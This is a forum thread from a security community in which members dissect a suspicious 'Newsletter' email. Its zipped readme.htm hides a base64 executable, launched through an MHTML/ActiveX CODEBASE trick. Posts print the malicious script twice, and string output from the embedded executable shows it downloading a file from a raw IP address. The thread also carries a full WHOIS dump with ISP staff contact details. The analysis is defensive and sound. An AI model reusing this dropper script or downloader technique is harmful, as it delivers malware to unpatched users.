Recieved A Strange File? thoughts
Page 1 of 2 12 LastLast
Results 1 to 10 of 14

Thread: Recieved A Strange File? thoughts

  1. #1
    The Doctor Und3ertak3r's Avatar
    Join Date
    Apr 2002
    Posts
    2,743

    Exclamation Recieved A Strange File? thoughts

    Hi Guys,

    Recieved a strange e-mail tonight..
    Addressed as from Admin..
    Subject: Newsletter
    Attachment: Readme.zip (size 1.2k)
    MEssage reads:
    Hello , ++und3rtak3rs=email addy-removed++


    New windows bug was detected , details in readme.htm file (attached) !

    This is not spam ! , you get this letter because you are member of www.security.org
    First: Security.ORG is a locksmiths organisation.. (well that is what I turned up when I keyed the url) So why the f are they emailing a Windows Bug warning?
    Second: I haven't subscribed to this mob's newsletters.. shud I need to learn to pick locks better (mind they nearly had me..Glad I checked the Website out)
    [b]Third.. why is the message in a ZIP file? esp when the file is only 1.2k in size?

    Next thought I would get my Offline machine to check the file..
    The contents of the Zip file was "Readme.htm"
    Viewing the contents of the file useing the View feature in Winrar:
    MIME-Version: 1.0
    Content-Location:file:///aaa.exe
    Content-Transfer-Encoding: base64

    TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAA
    ----64 or so lines removed--
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    <body bgcolor=black scroll=no><script>
    function f()
    {s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));path=unescape(path);
    document.write('<center><font color=red size=+5>Please wait loading message ..... <body scroll=no bgcolor=black><object classid="clsid:11111111-1111-1111-1111" CODEBASE="mhtml:'+path+'\\readme.htm!file:///aaa.exe"></object>')}
    setTimeout('f()',3000)</script>
    great this wants to run an executable.. and it seems to be in the email?
    am I right... anyone else seen this before?


    Cheers

    BTW.. I will see what happens when executed...

    hmmm.. my security settings prevent the execution of Activex Controls..hmmm
    perhaps I am glad I am not a locksmith...

    I still wonder why I can't use Norton or McAfee to remove this flu I have..
    "Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr

  2. #2
    str34m3r
    Guest
    Hey, Would you mind posting the zip file for us to pick apart? Call me crazy, but I enjoy doing computers forensics and reverse engineering malware.

  3. #3
    Member
    Join Date
    Sep 2002
    Posts
    77
    What email account did you receive it arrive in? Was it a hotmail one by any chance? I'm sure you know what they're like.

    By the looks of it somebody's trying to engineer you into running a trojan. That's my best guess. Afterall, for a bug warning, why would they need to run a message with an .exe? If they were trying to make a good impression and woo the world with their wonderful all singing all dancing warning, wouldn't they do it with JavaScript?

    The whole thing screams out script kiddie, especially the black background and red writing, one who hasn't done their homework properly (security.org(!!)).

    And yes it does look to be wanting to be loading it from the .htm file, or atleast somewhere on the HDD, in a temp directory (where winzip would extract the .htm file to when you double click it, this is what the unescape(path) does, I think).
    \"Death is more universal than life; everyone dies but not everyone lives.\"
    A. Sachs

  4. #4
    I recieved a somewhat similar file a while back. I recieved it over irc and it was called 'mindjail.html'. (IRC-New trojan ?)
    However the javascript in that file was not visible.
    The script is reckonized by norton antivirus as 'trojan.sefex'. *
    It is a patched IE bug afaik originally discovered by the people of malware.com (http://www.malware.com/gulp.html if I am correct)
    You could try to decode it by using UUDeview for Windows but the exe is probably UPXed.
    You can offcourse try to unUPX it: http://upx.sourceforge.net
    I would not recommend executing it on a production machine because it is probably a trojan.

    * I think norton reckonizes it because of the script because when I recreated a html file like that with a base 64 encoded 'hello world' program it got reckonized as that trojan.

    I hope this can be of any help.

    Cheers
    noODle

  5. #5
    The Doctor Und3ertak3r's Avatar
    Join Date
    Apr 2002
    Posts
    2,743

    Post

    Here is the File,

    When it executes it attempts to "Install" the aaa.exe also as mentioned in my other post.. I have a popup that says that the ActiveX Control is unable to run due to the security settings?

    The message waas recieved through my local ISP (my normal email account), hotmail and Yahoo are reserved for "handing out email addy's on the net"..best spam filter i use..

    Have attached the file

    Cheers

    edit:

    BTW: NAV.. reported nothing.. extracted the HTM file and scanned seperate.. clean..hmm am I jumpy? hmm virii under the bed..(instead of red's under the bed)
    hmm that is where I should be..
    "Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr

  6. #6
    Unfortunatly I have no testbox up at the moment.
    Anyway I ran bintext on it and here is the output:
    ===================================
    File pos Mem pos ID Text
    ======== ======= == ====

    0000004D 0040004D 0 !This program cannot be run in DOS mode.
    000001A8 004001A8 0 .text
    000001D0 004001D0 0 .rdata
    000001F7 004001F7 0 @.data
    0000066A 0040206A 0 DeleteFileA
    00000678 00402078 0 ExitProcess
    00000686 00402086 0 GetProcAddress
    00000698 00402098 0 LoadLibraryA
    000006A8 004020A8 0 WinExec
    000006B2 004020B2 0 lstrcatA
    000006BE 004020BE 0 lstrcpynA
    000006C8 004020C8 0 kernel32.dll
    00000800 00403000 0 http://64.246.56.74/~caraoke/ksp.exe
    00000825 00403025 0 mshex.exe
    00000847 00403047 0 Download
    ===================================

    The file did not get reckonized as a trojan.
    My first guess is that it will try to download the file from the URL^^, however the url did not exist.

  7. #7
    HeadShot Master N1nja Cybr1d's Avatar
    Join Date
    Jul 2003
    Location
    Boston, MA
    Posts
    1,840
    well I ran a neotrace on http://64.246.56.74/~caraoke/ksp.exe and this is what I got:
    NOTICE AND TERMS OF USE: You are not authorized to access or query our WHOIS
    database through the use of high-volume, automated, electronic processes. The
    Data in Network Solutions' WHOIS database is provided by Network Solutions for information
    purposes only, and to assist persons in obtaining information about or related
    to a domain name registration record. Network Solutions does not guarantee its accuracy.
    By submitting a WHOIS query, you agree to abide by the following terms of use:
    You agree that you may use this Data only for lawful purposes and that under no
    circumstances will you use this Data to: (1) allow, enable, or otherwise support
    the transmission of mass unsolicited, commercial advertising or solicitations
    via e-mail, telephone, or facsimile; or (2) enable high volume, automated,
    electronic processes that apply to Network Solutions (or its computer systems). The
    compilation, repackaging, dissemination or other use of this Data is expressly
    prohibited without the prior written consent of Network Solutions. You agree not to use
    high-volume, automated, electronic processes to access or query the WHOIS
    database. Network Solutions reserves the right to terminate your access to the WHOIS
    database in its sole discretion, including without limitation, for excessive
    querying of the WHOIS database or for failure to otherwise abide by this policy.
    Network Solutions reserves the right to modify these terms at any time.



    The data in Register.com's WHOIS database is provided to you by
    Register.com for information purposes only, that is, to assist you in
    obtaining information about or related to a domain name registration
    record. Register.com makes this information available as is, and
    does not guarantee its accuracy. By submitting a WHOIS query, you
    agree that you will use this data only for lawful purposes and that,
    under no circumstances will you use this data to: (1) allow, enable,
    or otherwise support the transmission of mass unsolicited, commercial
    advertising or solicitations via direct mail, electronic mail, or by
    telephone; or (2) enable high volume, automated, electronic processes
    that apply to Register.com (or its systems). The compilation,
    repackaging, dissemination or other use of this data is expressly
    prohibited without the prior written consent of Register.com.
    Register.com reserves the right to modify these terms at any time.
    By submitting this query, you agree to abide by these terms.


    Organization:
    Everyone's Internet
    Robert Marsh
    2600 Southwest Freeway
    Houston, TX 77098
    US
    Phone: 713-400-5400
    Fax..: 713-942-9332
    Email: ram@ev1.net

    Registrar Name....: Register.com
    Registrar Whois...: whois.register.com
    Registrar Homepage: http://www.register.com

    Domain Name: EV1.NET

    Created on..............: Thu, Oct 29, 1998
    Expires on..............: Thu, Oct 28, 2010
    Record last updated on..: Wed, Apr 09, 2003

    Administrative Contact:
    Everyone's Internet
    Robert Marsh
    2600 Southwest Freeway
    Houston, TX 77098
    US
    Phone: 713-400-5400
    Fax..: 713-942-9332
    Email: ram@ev1.net

    Technical Contact:
    Everyone's Internet
    Robert Marsh
    2600 Southwest Freeway
    Houston, TX 77098
    US
    Phone: 713-400-5400
    Fax..: 713-942-9332
    Email: ram@ev1.net

    Zone Contact:
    Everyone's Internet
    Robert Marsh
    2600 Southwest Freeway
    Houston, TX 77098
    US
    Phone: 713-400-5400
    Fax..: 713-942-9332
    Email: ram@ev1.net

    Domain servers in listed order:

    NS2.EV1.NET 216.88.77.7
    NS1.EV1.NET 216.88.76.6

    Register your domain name at http://www.register.com
    -----------------------------------------------------------------------
    OrgName: Everyones Internet, Inc.
    OrgID: EVRY
    Address: 2600 Southwest Frwy., Suite 500
    City: Houston
    StateProv: TX
    PostalCode: 77098
    Country: US

    NetRange: 64.246.0.0 - 64.246.63.255
    CIDR: 64.246.0.0/18
    NetName: EVRY-BLK-9
    NetHandle: NET-64-246-0-0-1
    Parent: NET-64-0-0-0-0
    NetType: Direct Allocation
    NameServer: NS1.EV1.NET
    NameServer: NS2.EV1.NET
    Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
    RegDate: 2001-10-05
    Updated: 2003-03-31

    TechHandle: RW172-ARIN
    TechName: Williams, Randy
    TechPhone: +1-713-400-5400
    TechEmail: admin@ev1.net

    OrgTechHandle: RW172-ARIN
    OrgTechName: Williams, Randy
    OrgTechPhone: +1-713-400-5400
    OrgTechEmail: admin@ev1.net

    ARIN WHOIS database, last updated 2003-07-26 19:15
    Enter ? for additional hints on searching ARIN's WHOIS database.
    -------------------------------------------------------------------------
    Name: rs-64-246-56-74.ev1.net
    IP Address: 64.246.56.74
    Location: Houston (29.761N, 95.361W)
    Network: EVRY-BLK-9



    Hope this helps a bit.


    The previous information has been obtained either directly from the
    registrant or a registrar of the domain name other than Network Solutions.
    Network Solutions, therefore, does not guarantee its accuracy or completeness.

  8. #8
    Senior Member
    Join Date
    Dec 2001
    Posts
    134
    Well here's the html source that ends up being run in your browser, it's all relative though so I don't know if it would run different out of the email or if whoever made it wrote it like that and then forgot to change it when they sent it out...

    <center><font color=red size=+5>Please wait loading message ..... <body scroll=no bgcolor=black><object classid="clsid:11111111-1111-1111-1111" CODEBASE="mhtml:file://C:\suspect-file\readme.htm!file:///aaa.exe"></object>
    Reality is the one who has it wrong, not you

  9. #9
    Pecosian,
    The html you pasted will execute the base64 encoded .exe that is in the html source (but left out by Und3ertak3r).
    The purpose of files like these is to trick users into opening them. Because the have the .html extension people don't suspect it. This way you can plant a trojan on a users box (providing they are using IE and have not patched their machine).
    In one of the previous posts I linked to the original posted exploit finders.

    Edit
    Here is the securityfocus bid.
    http://www.securityfocus.com/bid/6961

    They state however that the bug has not been patched but to the best of my knowledge is has been patched (or atleast partly) because the 'self-executing' hello world I created does not run on my Win2k *fully patched machine but does run on my unpatched XP.


  10. #10
    rebmeM roineS enilnOitnA steve.milner's Avatar
    Join Date
    Jul 2003
    Posts
    1,018
    Third.. why is the message in a ZIP file? esp when the file is only 1.2k in size?
    An attempt to get it through the mail server's rules (removing .exe, html mail etc) perhaps.

    Any chance of posting the mail headers (with suitable changes to protect yourself) Tracking down mail is a hobby of mine.

    Steve.
    IT, e-commerce, Retail, Programme & Project Management, EPoS, Supply Chain and Logistic Services. Yorkshire. http://www.bigi.uk.com

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •